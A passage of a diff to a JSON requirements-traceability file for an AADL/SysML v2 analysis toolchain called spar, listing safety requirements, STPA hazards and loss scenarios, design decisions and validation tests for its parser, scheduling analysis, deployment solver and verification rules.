+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "resolution",
+        "as5506-ch4"
+      ],
+      "title": "Cross-file classifier resolution",
+      "type": "requirement"
+    },
+    {
+      "description": "\nAt overview zoom levels,\nrendering must reduce visual clutter\n\nby collapsing internal details and showing only component\n\nboundaries and inter-component connections.\n",
+      "id": "RENDER-REQ-006",
+      "links": [],
+      "status": "implemented",
+      "tags": [],
+      "title": "Semantic zoom",
+      "type": "safety-requirement"
+    },
+    {
+      "description": "\nTiming,\nmemory,\nor deployment properties are parsed or evaluated\n\nto wrong numeric values,\ncausing analyses to compute incorrect\n\nresults (e.g.,\nwrong period causes RMA to pass when it should fail).\n",
+      "id": "H-6",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Property values incorrectly evaluated",
+      "type": "hazard"
+    },
+    {
+      "description": "Verifies that a complex InstanceNode tree (system > process > thread) with features, connections, array indices, and diagnostics survives JSON serialization round-trip.\n",
+      "id": "VAL-038",
+      "links": [
+        {
+          "target": "STPA-REQ-019",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-018",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Nested InstanceNode round-trip",
+      "type": "feature"
+    },
+    {
+      "description": "The solver must maintain documentation of its constraint model: which AADL properties map to which solver variables, which constraints are hard vs soft, which approximations are used at each layer, and what properties the virtual bus library must provide. This documentation must be updated when the constraint model changes and must be reviewable by safety engineers.\n",
+      "id": "SOLVER-REQ-034",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "documentation",
+        "stpa"
+      ],
+      "title": "Solver constraint model documentation",
+      "type": "requirement"
+    },
+    {
+      "description": "All tests in the spar workspace pass after batch 3 implementation (timing and scheduling safety requirements). cargo clippy --workspace reports no warnings.\n",
+      "id": "VAL-SUITE",
+      "links": [
+        {
+          "target": "STPA-REQ-002",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-004",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-005",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-006",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-007",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-009",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-010",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-011",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-012",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-014",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-015",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-017",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-018",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-019",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-024",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-025",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-026",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-027",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-028",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-029",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-030",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-031",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Full test suite execution",
+      "type": "feature"
+    },
+    {
+      "description": "Bazel verification rules must validate that the proof log artifact contains actual verification output (not empty or error-only). The verus_verify rule must check that the log contains a \"verification results\" summary line. The lean_verify rule must check that the log contains \"All proofs verified.\" A log that contains only error messages must cause the rule to fail.\n",
+      "id": "STPA-REQ-039",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "codegen",
+        "verification",
+        "bazel",
+        "stpa"
+      ],
+      "title": "Verification log content validation",
+      "type": "requirement"
+    },
+    {
+      "description": "Created crates/spar-analysis/src/modal.rs with has_modes() and mode_names() helper functions. These provide a clean API for analyses to query SOM status without directly accessing SystemInstance internals.\n",
+      "id": "ARCH-012",
+      "links": [
+        {
+          "target": "STPA-REQ-017",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Modal analysis helper module",
+      "type": "design-decision"
+    },
+    {
+      "description": "",
+      "id": "CC-S17",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Post-solve analysis must use fresh computation",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "The virtual bus library must provide separate worst-case and nominal values for latency, bandwidth, and jitter. The solver must use worst-case values for all constraint feasibility checks. Nominal values may be used only for optimization objective evaluation (not for constraint satisfaction). Library entries without worst-case values must produce a warning diagnostic.\n",
+      "id": "SOLVER-REQ-012",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "bus-binding",
+        "protocol-library",
+        "stpa"
+      ],
+      "title": "Worst-case protocol property usage",
+      "type": "requirement"
+    },
+    {
+      "description": "\nLayer 1 iteratively allocates processes:\nfirst assigns P1 to CPU1\n\n(schedulable),\nthen P2 to CPU1 (schedulable with P1),\nthen P3 to\n\nCPU1. After adding P3,\nthe combined utilization exceeds the RMA\n\nbound,\nbut Layer 1 does not re-run RTA after adding P3 because it\n\nchecked schedulability before the assignment using a quick\n\nutilization test that does not account for priority inversion\n\nblocking. The full RTA (which would detect the problem) was only\n\nrun for the initial two assignments.\n",
+      "id": "LS-S15",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Incremental allocation breaks prior schedulability",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "requires_modes flag stored in ItemTree during lowering. is_active_in_mode utility enables modal-aware connectivity and scheduling analysis without re-instantiation.\n",
+      "id": "ARCH-MODAL-FILTER",
+      "links": [
+        {
+          "target": "REQ-ANALYSIS-009",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "v0.5.0",
+        "modes"
+      ],
+      "title": "Modal filtering with requires_modes flag",
+      "type": "design-decision"
+    },
+    {
+      "description": "",
+      "id": "CC-SEC-2",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Timing property bounds validation before code generation",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "Tests for weight and power property aggregation up the component hierarchy, verifying correct summation and capacity violation detection at each level.\n",
+      "id": "VAL-WEIGHTPOWER-001",
+      "links": [
+        {
+          "target": "REQ-WEIGHTPOWER-001",
+          "type": "verifies"
+        },
+        {
+          "target": "ARCH-ANALYSIS-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "planned",
+      "tags": [],
+      "title": "Weight/power aggregation tests",
+      "type": "feature"
+    },
+    {
+      "description": "Parse and apply unit conversion factors for time, size, and rate properties (e.g., ms to us, KB to bytes).\n",
+      "id": "REQ-PROP-003",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "properties",
+        "as5506-ch11"
+      ],
+      "title": "Unit conversion",
+      "type": "requirement"
+    },
+    {
+      "description": "\nThe solver must produce identical results given identical inputs.\n\nAll internal orderings must be deterministic (sorted,\nnot hash-order).\n",
+      "id": "SC-S7",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Solver results must be deterministic",
+      "type": "system-constraint"
+    },
+    {
+      "description": "",
+      "id": "CTRL-CERTIFIER",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Certificate Generator",
+      "type": "controller"
+    },
+    {
+      "description": "Verifies that a model with mutual containment (A.Impl contains B, B.Impl contains A) produces a diagnostic containing \"circular\" or \"cycle\".\n",
+      "id": "VAL-019",
+      "links": [
+        {
+          "target": "STPA-REQ-012",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-007",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Circular containment detected",
+      "type": "feature"
+    },
+    {
+      "description": "Verifies that enumeration matching is case-insensitive per AADL spec.\n",
+      "id": "VAL-007",
+      "links": [
+        {
+          "target": "STPA-REQ-006",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-005",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Case-insensitive enum matching",
+      "type": "feature"
+    },
+    {
+      "description": "\nModel files provided by users or CI pipelines. May be\n\nattacker-controlled in supply chain scenarios.\n",
+      "id": "CP-SEC-MODEL-INPUT",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "SysML v2 / AADL Input Files",
+      "type": "controlled-process"
+    },
+    {
+      "description": "The solver must produce a summary report after each run containing: (a) number of components allocated, (b) number of connections bound, (c) resource utilization per processor/bus/memory as percentage of capacity, (d) list of all constraints checked with pass/fail status, (e) the optimality certificate, (f) list of all diagnostics by severity. The report must be both human-readable (text) and machine-parseable (JSON).\n",
+      "id": "SOLVER-REQ-035",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "reporting",
+        "stpa"
+      ],
+      "title": "Solver diagnostic summary report",
+      "type": "requirement"
+    },
+    {
+      "description": "\nAn AADL model defines processes named \"serde\",\n\"tokio\",\nand \"rand\".\n\nworkspace_gen produces Cargo.toml with workspace members\n\ncrates/serde,\ncrates/tokio,\ncrates/rand. These are also listed as\n\n[workspace.dependencies]\nwith path = \"crates/{name}\". However,\nthe\n\nper-crate Cargo.toml also depends on `serde = { workspace = true\n}`\n\nfrom [workspace.dependencies]\n— which resolves to the local path.\n\nThe risk emerges if an engineer adds an external dependency that\n\ntransitively depends on \"serde\" (the real one):\ncargo's resolver\n\nmust choose between the local \"serde\" (which is an AADL-generated\n\nskeleton with no serde functionality) and the crates.io version.\n\nThis causes a build failure at best,\nor silent miscompilation if\n\nthe generated crate happens to export expected symbols.\n",
+      "id": "LS-SEC-4",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Attack path: dependency confusion via generated workspace",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "When a bug or false negative is discovered and fixed, a regression test must be added that reproduces the original defect and verifies the fix. This prevents re-introduction of known-bad behavior.\n",
+      "id": "STPA-REQ-023",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "safety",
+        "testing",
+        "stpa"
+      ],
+      "title": "Regression test for each closed issue",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "CTRL-SEC-VERUS",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Verus/Bazel Verification Controller",
+      "type": "controller"
+    },
+    {
+      "description": "\nThe solver's optimality proof (e.g.,\ndual bound from LP relaxation,\n\nbranch-and-bound gap) contains an error — either in the mathematical\n\nformulation,\nthe numerical computation,\nor the gap calculation. The\n\ncertificate claims optimal when the solution is suboptimal,\nor claims\n\ninfeasible when a feasible solution exists.\n",
+      "id": "H-S6",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Optimality certificate is invalid",
+      "type": "hazard"
+    },
+    {
+      "description": "",
+      "id": "CC-S5",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Aggregate bus bandwidth must be checked",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "Added detect_circular_containment() function that performs DFS on the classifier reference graph before instantiation begins. Uses FxHashSet for visiting/visited sets with (package, type, impl) tuple keys. If a cycle is found, returns a diagnostic message with the cycle path.\n",
+      "id": "ARCH-007",
+      "links": [
+        {
+          "target": "STPA-REQ-012",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Pre-instantiation cycle detection via DFS",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nConnections between components are rendered as overlapping,\n\ncrossing,\nor tangled lines that make it impossible to trace\n\nwhich ports are connected. The visual topology does not match\n\nthe logical topology.\n",
+      "id": "H-R1",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Edge spaghetti obscures connection topology",
+      "type": "hazard"
+    },
+    {
+      "description": "",
+      "id": "CC-7",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Connection tracing must verify endpoints",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "Verify spar-wasm compiles to wasm32-wasip2 target.",
+      "id": "TEST-WASM-BUILD",
+      "links": [
+        {
+          "target": "REQ-WASM-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "WASM compilation verification",
+      "type": "feature"
+    },
+    {
+      "description": "\nThe virtual bus library entry for AFDX specifies worst-case latency\n\nas 2ms (the switch forwarding delay). But actual AFDX worst-case\n\nlatency under full network load is 32ms (due to regulatory shaping,\n\npriority scheduling across virtual links,\nand multi-hop switching).\n\nThe solver uses the library's 2ms value for E2E latency analysis.\n\nA flow with a 40ms deadline appears to have 10ms margin. At runtime,\n\nunder peak network load,\nthe actual AFDX latency reaches 30ms and\n\nthe flow's actual E2E latency reaches 58ms,\nviolating the deadline.\n",
+      "id": "LS-S10",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Virtual bus library understates AFDX worst-case latency",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "Indirectly verifies that the Builder max_depth is 100 by testing that instantiation of deep hierarchies succeeds.\n",
+      "id": "VAL-024",
+      "links": [
+        {
+          "target": "STPA-REQ-012",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-008",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Max depth increased to 100",
+      "type": "feature"
+    },
+    {
+      "description": "Tests for public API, serde round-trips, and Database queries.",
+      "id": "TEST-HIR",
+      "links": [
+        {
+          "target": "ARCH-HIR",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "HIR facade unit tests",
+      "type": "feature"
+    },
+    {
+      "description": "Unit conversion factors in standard_properties.rs must be validated against AS5506 Appendix A values. The test suite must include explicit tests for every unit type (Time, Size, Data_Rate) verifying that conversion between all unit pairs produces correct results. Example: 1 ms = 1_000 us = 1_000_000 ns.\n",
+      "id": "STPA-REQ-005",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "safety",
+        "properties",
+        "units",
+        "stpa"
+      ],
+      "title": "Unit conversion factor validation",
+      "type": "requirement"
+    },
+    {
+      "description": "The SysML v2 lower_node function must not silently drop unrecognized SyntaxKind variants. The wildcard arm `_ => {}` must be replaced with explicit arms for known non-semantic kinds and a catch-all that emits a warning diagnostic \"unhandled SysML v2 construct: {kind}\". This mirrors the AADL lowering exhaustiveness (STPA-REQ-004).\n",
+      "id": "STPA-REQ-032",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "sysml2",
+        "lowering",
+        "stpa"
+      ],
+      "title": "SysML v2 lowering diagnostic for unhandled constructs",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "CC-19",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Generated crates must include verification targets",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "Tests for spar-verify-macros proc-macro crate covering #[aadl(...)] attribute expansion, compile-time model checks, and error reporting for invalid attribute arguments.\n",
+      "id": "VAL-VERIFY-MACROS-001",
+      "links": [
+        {
+          "target": "REQ-CODEGEN-VERIFY-BUILD",
+          "type": "verifies"
+        },
+        {
+          "target": "ARCH-CODEGEN-002",
+          "type": "satisfies"
+        }
+      ],
+      "status": "pass",
+      "tags": [],
+      "title": "Verify macro proc-macro tests",
+      "type": "feature"
+    },
+    {
+      "description": "Verifies that a valid positive array dimension produces no diagnostic.\n",
+      "id": "VAL-023",
+      "links": [
+        {
+          "target": "STPA-REQ-009",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-009",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Positive array dimension no false positive",
+      "type": "feature"
+    },
+    {
+      "description": "Will verify that part defs with thread-like properties are classified as process/thread (not system), and that subcomponent categories are propagated from referenced type definitions. Blocked on STPA-REQ-033 and STPA-REQ-034 implementation.\n",
+      "id": "VAL-061",
+      "links": [
+        {
+          "target": "STPA-REQ-033",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-034",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-027",
+          "type": "satisfies"
+        }
+      ],
+      "status": "planned",
+      "tags": [],
+      "title": "SysML v2 category inference validation (planned)",
+      "type": "feature"
+    },
+    {
+      "description": "Verifies that worst-case execution time greater than period produces an error diagnostic.\n",
+      "id": "VAL-046",
+      "links": [
+        {
+          "target": "STPA-REQ-027",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Execution time exceeding period produces error",
+      "type": "feature"
+    },
+    {
+      "description": "",
+      "id": "CC-13",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Serialization must include all public fields",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nInconsistent,\nincorrect,\nor confusing analysis results cause\n\nengineers to bypass spar and rely on manual review,\neliminating\n\nthe safety benefit of automated analysis.\n",
+      "id": "L-3",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Loss of trust in toolchain",
+      "type": "loss"
+    },
+    {
+      "description": "",
+      "id": "CC-1",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Parser must emit diagnostic for unrecognized constructs",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "Tests for git-aware structural diff covering component addition/ removal detection, property change detection, analysis impact comparison between revisions, SARIF output format validation, and three-way merge conflict detection.\n",
+      "id": "VAL-DIFF-001",
+      "links": [
+        {
+          "target": "REQ-DIFF-001",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-DIFF-002",
+          "type": "verifies"
+        },
+        {
+          "target": "REQ-DIFF-003",
+          "type": "verifies"
+        },
+        {
+          "target": "ARCH-DIFF-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "planned",
+      "tags": [],
+      "title": "Structural diff and analysis impact tests",
+      "type": "feature"
+    },
+    {
+      "description": "The verus_verify and lean_verify rules currently fall back to PATH lookup when the toolchain is not explicitly configured. The planned fix adds an explicit tool availability check at the start of each rule's run_shell command: `which verus || (echo \"ERROR: verus not found\" >&2; exit 1)`. Additionally, the rule should verify tool version by parsing `verus --version` output.\n",
+      "id": "ARCH-030",
+      "links": [
+        {
+          "target": "STPA-REQ-037",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Verification tool availability guard in Bazel rules (planned)",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nThe parser accepts input without error but silently omits valid\n\nAADL constructs from the CST,\ncausing downstream analyses to\n\noperate on an incomplete model.\n",
+      "id": "H-5",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Parser silently drops valid AADL constructs",
+      "type": "hazard"
+    },
+    {
+      "description": "Tests for SysML v2 to AADL lowering covering diagnostic handling for unrecognized constructs, category propagation from part definitions to subcomponents, and property value lowering for numeric constraints with units. Validates the SEI mapping rules implementation.\n",
+      "id": "VAL-SYSML2-LOWER-001",
+      "links": [
+        {
+          "target": "REQ-SYSML2-LOWER",
+          "type": "verifies"
+        },
+        {
+          "target": "ARCH-SYSML2-003",
+          "type": "satisfies"
+        }
+      ],
+      "status": "pass",
+      "tags": [],
+      "title": "SysML v2 lowering tests",
+      "type": "feature"
+    },
+    {
+      "description": "The source rewriter must not delete, modify, or reorder existing property associations. New binding properties must be inserted at a deterministic position: after the last existing property in the component's properties block, or in a new properties block if none exists. Before insertion, the rewriter must check whether the property already exists; if so, it must update the value in place rather than inserting a duplicate.\n",
+      "id": "SOLVER-REQ-018",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "rewriter",
+        "preservation",
+        "stpa"
+      ],
+      "title": "Existing property preservation during rewrite",
+      "type": "requirement"
+    },
+    {
+      "description": "Will verify that verus_verify and lean_verify rules fail with a clear error when the tool binary is not found. Blocked on STPA-REQ-037 implementation.\n",
+      "id": "VAL-063",
+      "links": [
+        {
+          "target": "STPA-REQ-037",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-030",
+          "type": "satisfies"
+        }
+      ],
+      "status": "planned",
+      "tags": [],
+      "title": "Verification tool availability guard (planned)",
+      "type": "feature"
+    },
+    {
+      "description": "",
+      "id": "CC-S11",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Source rewrite must target correct CST node",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "The MCP server is a new spar CLI subcommand (spar mcp) that communicates over stdio using JSON-RPC. Analysis passes are exposed as MCP tools, instance model elements as MCP resources. The server reuses the existing Database and AnalysisRunner infrastructure.\n",
+      "id": "ARCH-MCP-001",
+      "links": [
+        {
+          "target": "REQ-MCP-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "planned",
+      "tags": [
+        "architecture",
+        "mcp",
+        "v040"
+      ],
+      "title": "MCP server as CLI command with stdio JSON-RPC transport",
+      "type": "design-decision"
+    },
+    {
+      "description": "Verifies that classifier values match Classifier types and reference values match Reference types.\n",
+      "id": "VAL-014",
+      "links": [
+        {
+          "target": "STPA-REQ-006",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-005",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Classifier and reference value matching",
+      "type": "feature"
+    },
+    {
+      "description": "Regression guard verifying that ports without the Intentionally_Unconnected property still produce connectivity warnings.\n",
+      "id": "VAL-030",
+      "links": [
+        {
+          "target": "STPA-REQ-018",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-014",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Unannotated port still warns",
+      "type": "feature"
+    },
+    {
+      "description": "",
+      "id": "UCA-2",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Parser accepts invalid AADL without error",
+      "type": "uca"
+    },
+    {
+      "description": "Verifies that an array with dimension 0 produces a diagnostic and the function returns 1 as fallback.\n",
+      "id": "VAL-022",
+      "links": [
+        {
+          "target": "STPA-REQ-009",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-009",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Zero-dimension array produces diagnostic",
+      "type": "feature"
+    },
+    {
+      "description": "\nAn architecture with safety-critical defects (scheduling overrun,\n\nsingle-point-of-failure,\nunconnected safety paths) is approved for\n\nimplementation because spar failed to detect the defect.\n",
+      "id": "L-1",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Unsafe architecture approved",
+      "type": "loss"
+    },
+    {
+      "description": "The solver must persist its output binding configuration as a structured artifact (JSON or YAML) alongside the optimality certificate. This artifact must contain: the complete binding map, the protocol selection for each connection, the resource utilization for each processor/bus/memory, and a hash of the input model. Re-running the solver with the same input hash must produce the same binding or report a divergence diagnostic.\n",
+      "id": "SOLVER-REQ-031",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "reproducibility",
+        "persistence",
+        "stpa"
+      ],
+      "title": "Solution persistence for reproducibility",
+      "type": "requirement"
+    },
+    {
+      "description": "The response-time analysis must extract the maximum (worst-case) value from Compute_Execution_Time range properties. When a range is specified (e.g., \"1 ms .. 5 ms\"), the RTA must use 5 ms. When a single value is specified, it is treated as both best-case and worst-case. The RTA must emit a diagnostic if only a single value is provided, advising the engineer to specify a range.\n",
+      "id": "SOLVER-REQ-002",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "scheduling",
+        "stpa"
+      ],
+      "title": "RTA must use worst-case execution time",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "CC-3",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Property evaluation must use standard unit factors",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "Generated Kani harnesses must include a doc comment specifying which properties are verified (e.g., \"base case: no interference\") and which are not (e.g., \"does NOT verify multi-task interference\"). Generated Lean4 proofs must include a comment block listing assumptions. Harness function names must include scope qualifiers (e.g., verify_{name}_no_deadline_miss_base_case). The codegen must also generate a coverage_manifest.json listing each verification artifact and its scope.\n",
+      "id": "STPA-SEC-REQ-006",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "security",
+        "verification",
+        "stpa-sec"
+      ],
+      "title": "Verification coverage scope annotations",
+      "type": "requirement"
+    },
+    {
+      "description": "Model IEC 62443 / ISO 21434 security zones as AADL system components with security-level properties. Validate that cross-zone connections have appropriate protection (encryption, authentication). Account for security overhead (TLS latency, MAC computation) in timing analysis.\n",
+      "id": "REQ-SOLVER-009",
+      "links": [],
+      "status": "planned",
+      "tags": [
+        "solver",
+        "security",
+        "v040"
+      ],
+      "title": "Security zone and conduit validation",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "UCA-S4",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Allocator exceeds processor capacity",
+      "type": "uca"
+    },
+    {
+      "description": "Each analysis (scheduling, latency, resource_budget) now checks instance.system_operation_modes at the end of analyze(). If SOMs exist, an Info-severity diagnostic is emitted stating that default (non-modal) property values were used and how many SOMs exist.\n",
+      "id": "ARCH-013",
+      "links": [
+        {
+          "target": "STPA-REQ-017",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "SOM awareness info diagnostic in analyses",
+      "type": "design-decision"
+    },
+    {
+      "description": "",
+      "id": "UCA-6",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Instance expansion misses subcomponent",
+      "type": "uca"
+    },
+    {
+      "description": "Rate Monotonic Analysis on threads grouped by processor binding. Check utilization bounds.\n",
+      "id": "REQ-ANALYSIS-002",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "analysis",
+        "scheduling"
+      ],
+      "title": "Scheduling analysis (RMA)",
+      "type": "requirement"
+    },
+    {
+      "description": "\nUnrecognized SysML v2 syntax kinds must produce diagnostics.\n\nCategory inference must be auditable and deterministic. Lowering\n\nfidelity must be validated against reference SysML v2 models.\n",
+      "id": "SC-SEC-4",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "SysML v2 lowering must not silently drop constructs",
+      "type": "system-constraint"
+    },
+    {
+      "description": "Verifies that a complete AADL package with types, implementations, features, and subcomponents produces zero lowering diagnostics.\n",
+      "id": "VAL-003",
+      "links": [
+        {
+          "target": "STPA-REQ-002",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-004",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Clean package produces no diagnostics",
+      "type": "feature"
+    },
+    {
+      "description": "Annex sublanguage parsing for EMV2 and Behavior Annex.\n",
+      "id": "ARCH-ANNEX",
+      "links": [
+        {
+          "target": "REQ-ANALYSIS-005",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "spar-annex",
+      "type": "design-decision"
+    },
+    {
+      "description": "",
+      "id": "TEST-SYNTAX",
+      "links": [
+        {
+          "target": "ARCH-SYNTAX",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Syntax tree unit tests",
+      "type": "feature"
+    },
+    {
+      "description": "\nThe solver co-locates software of different safety levels (e.g.,\nDAL-A\n\nand DAL-D) on the same processor or bus without adequate fault\n\ncontainment. A failure in the lower-criticality component can\n\npropagate to the higher-criticality component,\ndefeating the safety\n\narchitecture's redundancy assumptions.\n",
+      "id": "L-S2",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Safety isolation violated in deployment",
+      "type": "loss"
+    },
+    {
+      "description": "Created property_accessors.rs consolidating duplicate property parsing helpers from 6 analysis modules into 7 shared functions: get_timing_property, get_execution_time, get_execution_time_or_exec, get_processor_binding, get_size_property, get_memory_binding, extract_reference_target. Each returns typed values (u64 picoseconds, u64 bits, String reference name).\n",
+      "id": "ARCH-017",
+      "links": [
+        {
+          "target": "STPA-REQ-015",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Shared typed property accessors module",
+      "type": "design-decision"
+    },
+    {
+      "description": "Verifies that a thread with both Period and Deadline does not emit the implicit-deadline info diagnostic.\n",
+      "id": "VAL-044",
+      "links": [
+        {
+          "target": "STPA-REQ-026",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Explicit Deadline suppresses info",
+      "type": "feature"
+    },
+    {
+      "description": "\nThe solver computes a binding,\nrewrites the AADL source files,\n\nthen runs post-solve validation by calling the analysis passes.\n\nBut the salsa database still has the pre-rewrite file contents\n\ncached. The analysis passes read the old property values (no\n\nbinding) and report missing bindings. The engineer sees validation\n\nfailures and believes the solver failed,\nwhen in fact the analysis\n\nis reading stale data. Alternatively,\nthe stale cache makes the\n\nvalidation pass because the pre-rewrite model also happened to\n\nsatisfy the checked constraints,\nmasking new issues introduced by\n\nthe rewrite.\n",
+      "id": "LS-S7",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Salsa cache returns pre-rewrite property values",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "The SysML v2 lowering test suite must contain at least one test for each of the 14+ lowering rules, verifying that the produced AADL ItemTree has the correct category, features, subcomponents, connections, and property associations. A golden model test must verify end-to-end lowering of a non-trivial SysML v2 model.\n",
+      "id": "STPA-REQ-036",
+      "links": [],
+      "status": "partial",
+      "tags": [
+        "safety",
+        "sysml2",
+        "testing",
+        "stpa"
+      ],
+      "title": "SysML v2 lowering coverage test suite",
